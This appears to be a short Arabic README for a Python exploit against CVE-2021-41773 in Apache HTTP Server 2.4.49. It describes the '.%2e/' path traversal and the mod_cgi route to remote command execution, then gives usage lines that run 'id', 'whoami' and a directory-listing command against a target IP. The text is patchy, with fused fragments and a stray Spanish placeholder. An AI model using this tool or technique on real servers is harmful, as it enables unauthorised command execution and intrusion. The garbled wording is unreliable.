
# استغلال Python لـ Apache 2.4.49 لاجتياز المسار وتنفيذ الأوامر عن بُعد (CVE-2021-41773) يرسل طلبات مصممة خصيصًا لتنفيذ أوامر عشوائية على الخوادم المعرضة للخطر.
تؤثر هذه الثغرة الأمنية على إصدارات Apache HTTP Server 2.4.49. يؤدي خطأ في التحقق من المسار إلى تمكين المهاجمين عن بعد من تنفيذ تجاوز المسار (Path Traversal) باستخدام تسلسلات مثل .%2e/ للوصول إلى مسارات خارج الدليل الجذر المكوّن.
عندما تكون وحدة mod_cgi مفعلة، يمكن للمهاجم تنفيذ أوامر اعتباطية عن طريق إرسال طلبات مصممة خصيصًا إلى ملف CGI. يتيح ذلك تنفيذ التعليمات البرمجية عن بعد (RCE).
mod_cgiيتيح هذا السكريبت استغلال الثغرة عن طريق إرسال أوامر عن بعد إلى الخادم المتأثر.
curlpython3 exploit.py -i <IP_DEL_SERVIDOR> -c <COMANDO>
python3 exploit.py -i 172.17.0.2 -c "id"
python3 exploit.py -i 172.17.0.2 -c "whoami"
python3 exploit.py -i 172.17.0.2 -c "cd ../../../ && ls -la"